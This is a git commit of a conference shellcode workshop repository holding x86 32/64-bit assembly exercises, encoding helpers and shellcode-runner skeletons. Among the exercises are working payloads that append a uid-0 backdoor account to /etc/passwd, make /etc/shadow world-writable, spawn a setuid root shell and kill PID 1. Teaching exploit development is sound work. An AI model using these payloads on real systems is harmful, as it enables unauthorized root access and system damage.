commit cc0cee84ff831bd4ab0d6f0b9cc03434fa9e2c3a Author: Daniel Ashton Date: Mon May 30 09:06:47 2016 +0200 init diff --git a/README b/README new file mode 100644 index 0000000..ee599e2 --- /dev/null +++ b/README @@ -0,0 +1,16 @@ + _____ __ __ ___ _ _ __ ___ ___ ___ _ ____ ____ + / ___/| | | / _]| | | | / ] / \ | \ / _] | | / || \ +( \_ | | | / [_ | | | | / / | || \ / [_ _____ | | | o || o ) + \__ || _ || _]| |___ | |___ / / | O || D || _] || |___ | || | + / \ || | || [_ | || / \_ | || || [_|_____|| || _ || O | + \ || | || || || \ || || || | | || | || | + \___||__|__||_____||_____||_____|\____| \___/ |_____||_____| |_____||__|__||_____| + + +Collection of Shellcode Lab Sessions at from different cons the past years. Consists of PDF Slides and Example codes. + +x86_32 - This is the Shellcode Lab for IA-32 saying 32Bit Intel CPUs +x86_64 - This is the Shellcode Lab for IA-64 saying 64Bit CPUs + +Cheers +dash diff --git a/x86_32/Example_Code/adduser_etc_passwd.asm b/x86_32/Example_Code/adduser_etc_passwd.asm new file mode 100644 index 0000000..2c47e1c --- /dev/null +++ b/x86_32/Example_Code/adduser_etc_passwd.asm @@ -0,0 +1,53 @@ +; shellcode lab @ hack4 +; dash + +BITS 32 +global _start + +_start: +xor eax, eax +xor ebx, ebx +xor ecx, ecx + +mov eax, 5 +push ebx +push 0x64777373 +push 0x61702f63 +push 0x74652f2f +mov ebx, esp +mov ecx, 0x401 +int 0x80 + +; take filedescriptor +xor ebx, ebx +mov ebx, eax + +; write(f_open, line, 24) +xor eax, eax +xor ecx, ecx +mov eax, 4 + +push ecx +push byte 0x0a +push 0x68736162 +push 0x2f6e6962 +push 0x2f3a746f +push 0x6f722f3a +push 0x3a303a30 +push 0x3a494e73 +push 0x386b5a39 +push 0x65736d48 +push 0x42413a72 +push 0x336b6361 +push 0x68316f6e +mov ecx, esp +mov edx, 45 +int 0x80 + +;close maybe?? ah forget that :> + +; exit(23) +mov eax, 1 +mov ebx, 23 +int 0x80 + diff --git a/x86_32/Example_Code/ascii_converter.py b/x86_32/Example_Code/ascii_converter.py new file mode 100644 index 0000000..ef0e2e2 --- /dev/null +++ b/x86_32/Example_Code/ascii_converter.py @@ -0,0 +1,21 @@ +#!/usr/bin/env python +# +# ascii converter for shellcoding-lab at hack4 +# ~dash in 2014 +# + +import sys +import binascii + +text = sys.argv[1] + +def usage(): + print "./%s " % (sys.argv[0]) +if len(sys.argv)<2: + usage() + exit() + +val = binascii.hexlify(text[::-1]) + +print "Stringlen: %d" % len(text) +print "String: %s" % val diff --git a/x86_32/Example_Code/ascii_converter2.py b/x86_32/Example_Code/ascii_converter2.py new file mode 100644 index 0000000..b169d52 --- /dev/null +++ b/x86_32/Example_Code/ascii_converter2.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +import sys +import binascii + +text = sys.argv[1] + +def usage(): + print "./%s " % (sys.argv[0]) +if len(sys.argv)<2: + usage() + exit() + +val = binascii.hexlify(text[::-1]) + +print "Stringlen: %d" % len(text) +print "String: %s" % val +print +for i in range(len(val)): + if i % 8 == 0: + print "push 0x", + + print "\b%c" % val[i], + i=i+1 + k = i % 8 + if k == 0: + print + + diff --git a/x86_32/Example_Code/bad_setuid_shell.asm b/x86_32/Example_Code/bad_setuid_shell.asm new file mode 100644 index 0000000..558f180 --- /dev/null +++ b/x86_32/Example_Code/bad_setuid_shell.asm @@ -0,0 +1,21 @@ +global _start + +section .text +_start: + +;setuid +xor eax, eax +mov ebx, eax +mov eax, 11 +int 0x80 + +;execve +xor ecx, ecx +push ecx +push 0x69732f2f +push 0x6e69622f +mov ebx, esp +mov edx, 0x00000000 +xor eax, eax +mov eax, 11 +int 0x80 diff --git a/x86_32/Example_Code/chmod_shadow_0bytes.asm b/x86_32/Example_Code/chmod_shadow_0bytes.asm new file mode 100644 index 0000000..e5b7007 --- /dev/null +++ b/x86_32/Example_Code/chmod_shadow_0bytes.asm @@ -0,0 +1,27 @@ +; shellcodelab@hack4 +; by dash + +BITS 32 +global _start + +_start: +xor eax, eax +xor ebx, ebx +xor ecx, ecx + +;chmod +mov ecx, 0x1ff ;0777 +push ebx ;null terminator +push 0x776f6461 ;/etc/shadow +push 0x68732f63 +push 0x74652f2f +mov ebx, esp ;put the address of esp to ebx (shadow) +mov eax, 15 +int 0x80 + +;exit +xor eax, eax +xor ebx, ebx +mov eax, 1 +int 0x80 + diff --git a/x86_32/Example_Code/chmod_shadow_no0.asm b/x86_32/Example_Code/chmod_shadow_no0.asm new file mode 100644 index 0000000..80127bc --- /dev/null +++ b/x86_32/Example_Code/chmod_shadow_no0.asm @@ -0,0 +1,26 @@ +; shellcode-lab@hack4 +; by dash + +BITS 32 +global _start + +_start: +xor eax, eax +xor ebx, ebx +xor ecx, ecx + +;chmod +mov cx, 0x1ff ;0777 +push ebx ;null terminator +push 0x776f6461 ;/etc/shadow +push 0x68732f63 +push 0x74652f2f +mov ebx, esp ;put the address of esp to ebx (shadow) +mov al, 15 +int 0x80 + +;exit +xor eax, eax +xor ebx, ebx +mov al, 1 +int 0x80 diff --git a/x86_32/Example_Code/crypt_des_tool.py b/x86_32/Example_Code/crypt_des_tool.py new file mode 100644 index 0000000..df68606 --- /dev/null +++ b/x86_32/Example_Code/crypt_des_tool.py @@ -0,0 +1,19 @@ +#!/usr/bin/env python2 +# +# crypt des tool for shellcoding lab at hack4 +# ~dash + +import sys +import crypt + +def usage(): + print "%s " % (sys.argv[0]) + +if len(sys.argv)<2: + usage() + exit() + +password = sys.argv[1] +pw = crypt.crypt(password,'AB') +print "Password: %s" % pw + diff --git a/x86_32/Example_Code/shell.c b/x86_32/Example_Code/shell.c new file mode 100644 index 0000000..ac0e9d0 --- /dev/null +++ b/x86_32/Example_Code/shell.c @@ -0,0 +1,20 @@ +/* shell.c + simple shell for shellcoding-lab at hack4 0x1 + probably ripped somewhere + ~dash +*/ + +#include +#include +#include + + +int main(){ + + char *args[2]; + + setuid(0); + args[0] = "/bin/sh"; + args[1] = NULL; + execve(args[0], args, NULL); +} diff --git a/x86_32/Example_Code/skeleton_mmap.c b/x86_32/Example_Code/skeleton_mmap.c new file mode 100644 index 0000000..d656446 --- /dev/null +++ b/x86_32/Example_Code/skeleton_mmap.c @@ -0,0 +1,26 @@ +#include +#include + +char shellcode[] = ""; + +int main(int argc, char **argv) +{ + // Allocate some read-write memory + void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + + // Copy the shellcode into the new memory + memcpy(mem, shellcode, sizeof(shellcode)); + + // Make the memory read-execute + mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC); + + // Call the shellcode + int (*func)(); + func = (int (*)())mem; + (int)(*func)(); + + // Now, if we managed to return here, it would be prudent to clean up the memory: + munmap(mem, sizeof(shellcode)); + + return 0; +} diff --git a/x86_32/Example_Code/skeleton_oldstyle.c b/x86_32/Example_Code/skeleton_oldstyle.c new file mode 100644 index 0000000..cc3f9dc --- /dev/null +++ b/x86_32/Example_Code/skeleton_oldstyle.c @@ -0,0 +1,15 @@ +#include +#include +#include + +char shellcode[] = ""; + +int main(void) +{ + int *ret; + + printf("%d\n",strlen(shellcode)); + ret = (int *)&ret+2; + *ret = (int)shellcode; +return 0; +} diff --git a/x86_32/Shellcode-Lab32_0x01.pdf b/x86_32/Shellcode-Lab32_0x01.pdf new file mode 100644 index 0000000..3ad4a41 Binary files /dev/null and b/x86_32/Shellcode-Lab32_0x01.pdf differ diff --git a/x86_64/Example_Code/8bit.asm b/x86_64/Example_Code/8bit.asm new file mode 100644 index 0000000..cd3f45a --- /dev/null +++ b/x86_64/Example_Code/8bit.asm @@ -0,0 +1,18 @@ +; 8 bit registers 'undocumented', test +; dash@hack4.org +; May 2016 +; +; wikipedia, shellcode trainings no access to certain cpu registers in 8 bit mode +; however, they are addressable +; just adding right now a l to 16bit registers +; + +BITS 64 + +global _start +_start: + +mov spl, 1 +mov bpl, 2 +mov sil, 3 +mov dil, 4 diff --git a/x86_64/Example_Code/byte_placement_r10.asm b/x86_64/Example_Code/byte_placement_r10.asm new file mode 100644 index 0000000..caa4fa6 --- /dev/null +++ b/x86_64/Example_Code/byte_placement_r10.asm @@ -0,0 +1,22 @@ +; shellcode-lab64bit +; dash@hack4.org +; byte placements on 64 bit - example for new register r10 +BITS 64 +global _start + +_start: + +; former general purpose register +sub r10, r10 + +mov r10, 0x4142434445464748 +sub r10, r10 + +mov r10d, 0x41424344 +sub r10d, r10d + +mov r10w, 0x4142 +sub r10w, r10w + +mov r10b,0x42 +sub r10b, r10b diff --git a/x86_64/Example_Code/byte_placement_rax.asm b/x86_64/Example_Code/byte_placement_rax.asm new file mode 100644 index 0000000..a470393 --- /dev/null +++ b/x86_64/Example_Code/byte_placement_rax.asm @@ -0,0 +1,28 @@ +; shellcode-lab64bit +; dash@hack4.org +; byte placements on 64 bit - example +BITS 64 +global _start + +_start: + +; former general purpose register, example +; sub is used to clear out the register +sub rax, rax + +mov rax, 0x4142434445464748 +sub rax, rax + +mov eax, 0x41424344 +sub eax, eax + +; address 16bit +mov ax, 0x4142 + +; overwrite the higher byte of ax +; 0x4142 gets to 0x2d42 +mov ah,0x2d +sub ah, ah + +mov al,0x41 +sub al, al diff --git a/x86_64/Example_Code/clear_register.asm b/x86_64/Example_Code/clear_register.asm new file mode 100644 index 0000000..b17424f --- /dev/null +++ b/x86_64/Example_Code/clear_register.asm @@ -0,0 +1,22 @@ +; shellcode-lab64 +; dash@hack4.org +; + +; some example to zero-out a register +BITS 64 +global _start +_start: + +xor rax, rax ; initial clearing - classic xor +mov rax, 0xDEADBEEF +sub rax, rax ; sub opcode + +mov rax, 0xF00DBABE +xor rax, rax ; classic xor + +; check value of register and add or sub from that +; let's assume 29A is in the register rcx +sub rcx, rcx +mov rcx, 0x29A +sub rcx, 666 +; zero'd diff --git a/x86_64/Example_Code/execve.asm b/x86_64/Example_Code/execve.asm new file mode 100644 index 0000000..ba4b909 --- /dev/null +++ b/x86_64/Example_Code/execve.asm @@ -0,0 +1,21 @@ +BITS 64 +global _start + +_start: + +xor rax, rax + +push rax ; null terminator for the string +mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards +push rbx ; +mov rdi, rsp ; move address from stack pointer to first argument + +push rax +push rdi ; actually we would not need this one +mov rsi, rsp ; move the address to the 2nd argument + +mov rdx, rax ; no envp necessary + +mov al,0x3B ; execve into rax + +syscall diff --git a/x86_64/Example_Code/execve_setuid.asm b/x86_64/Example_Code/execve_setuid.asm new file mode 100644 index 0000000..5cf7cab --- /dev/null +++ b/x86_64/Example_Code/execve_setuid.asm @@ -0,0 +1,29 @@ +BITS 64 +global _start + +_start: + +xor rax, rax +push rax ; push the cleared register +pop rdi ; pop the zer0z into 1st argument + +add al,0x69 ; setuid 105 or 0x69h +syscall ; call setuid(0) + + +xor rax, rax + +push rax ; null terminator for the string +mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards +push rbx ; +mov rdi, rsp ; move address from stack pointer to first argument + +push rax +push rdi ; actually we would not need this one +mov rsi, rsp ; move the address to the 2nd argument + +mov rdx, rax ; no envp necessary + +mov al,0x3B ; execve into rax + +syscall diff --git a/x86_64/Example_Code/exit.asm b/x86_64/Example_Code/exit.asm new file mode 100644 index 0000000..a038f6e --- /dev/null +++ b/x86_64/Example_Code/exit.asm @@ -0,0 +1,14 @@ +; shellcode lab 64Bit +; exit example as it should be ;) +; dsah@hack4.org +; +BITS 64 +global _start + +_start: + +xor rax,rax +xor rdx,rdx +mov al,0x3C +mov dil,4 +syscall diff --git a/x86_64/Example_Code/exit_nulls.asm b/x86_64/Example_Code/exit_nulls.asm new file mode 100644 index 0000000..2ed69e0 --- /dev/null +++ b/x86_64/Example_Code/exit_nulls.asm @@ -0,0 +1,16 @@ +; shellcode-lab 64Bit +; dash@hack4.org +; exit code with null bytes +; + +BITS 64 + +global _start + +_start: + +xor rax,rax +xor rdx,rdx +mov rax,0x3C +mov rdx,4 +syscall diff --git a/x86_64/Example_Code/kill.asm b/x86_64/Example_Code/kill.asm new file mode 100644 index 0000000..9289643 --- /dev/null +++ b/x86_64/Example_Code/kill.asm @@ -0,0 +1,27 @@ +; shellcode-lab 64Bit +; dash@hack4.org +; kill + exit +; + + +BITS 64 +global _start + +_start: + +xor rax, rax +xor rdi, rdi +xor rsi, rsi + + +mov dil, 1368 +mov sil,9 +mov al, 62 +syscall + +xor rax, rax +xor rdi, rdi + +add dil, 4 +mov al, 60 +syscall diff --git a/x86_64/Example_Code/kill_noexit.asm b/x86_64/Example_Code/kill_noexit.asm new file mode 100644 index 0000000..cdf2db3 --- /dev/null +++ b/x86_64/Example_Code/kill_noexit.asm @@ -0,0 +1,18 @@ +; shellcode-lab64bit +; dash@hack4.org +; don't execute that as root, as long as adjusted +; + +BITS 64 +global _start + +_start: + +xor rax, rax +xor rdi, rdi +xor rsi, rsi + +mov dil, 1 ; you might not want to run that as root +mov sil,9 +mov al, 62 +syscall diff --git a/x86_64/Example_Code/push.asm b/x86_64/Example_Code/push.asm new file mode 100644 index 0000000..15ee9ec --- /dev/null +++ b/x86_64/Example_Code/push.asm @@ -0,0 +1,16 @@ +; shellcode-lab64 +; dash@hack4.org +; push example and 8byte fun on 64bit architecture +; + +BITS 64 + +global _start +_start: + +push byte 0x41 +push word 0x4142 +push dword 0x41424344 +; let's comment that out +; comment it in to see the compile error +;push 0x4142434445464748 diff --git a/x86_64/Example_Code/push_mov.asm b/x86_64/Example_Code/push_mov.asm new file mode 100644 index 0000000..44e4e1a --- /dev/null +++ b/x86_64/Example_Code/push_mov.asm @@ -0,0 +1,14 @@ +; shellcode-lab64 +; dash@hack4.org +; push example and 8byte fun on 64bit architecture +; use mov to bring up your 8byte value on the stack +; + +BITS 64 + +global _start +_start: + +xor rax, rax ; clear register +mov rax, 0x4142434445464748 ; place 8byte in register rax +push rax ; push it onto the stack diff --git a/x86_64/Example_Code/skeleton.c b/x86_64/Example_Code/skeleton.c new file mode 100644 index 0000000..780761b --- /dev/null +++ b/x86_64/Example_Code/skeleton.c @@ -0,0 +1,17 @@ +/* shellcode-lab 64Bit + dash@hack4.org + + use -z execstack + or set char code to const +*/ + +#include +#include + +unsigned char code[] ="shellcode wants to be placed here!"; +main() +{ + printf("Shellcode Len: %d\n", (int)strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} diff --git a/x86_64/Example_Code/xchg.asm b/x86_64/Example_Code/xchg.asm new file mode 100644 index 0000000..990a523 --- /dev/null +++ b/x86_64/Example_Code/xchg.asm @@ -0,0 +1,20 @@ +; xchg example code +; dash@hack4.org +; shellcode lab +; may 2016 + +BITS 64 +global _start + +_start: + +xor rax, rax +xor rbx, rbx + +mov rax, 0x29A ; http://web.textfiles.com/ezines/29A/ +mov rbx, 0x539 +mov r10, 0xBEEFBEEFBEEFBEEF +xchg rax, r10 +xchg r10, r9 +xchg rbx, rax +xchg rdi,rsp diff --git a/x86_64/Shellcode-Lab64_0x01.pdf b/x86_64/Shellcode-Lab64_0x01.pdf new file mode 100644 index 0000000..497f348 Binary files /dev/null and b/x86_64/Shellcode-Lab64_0x01.pdf differ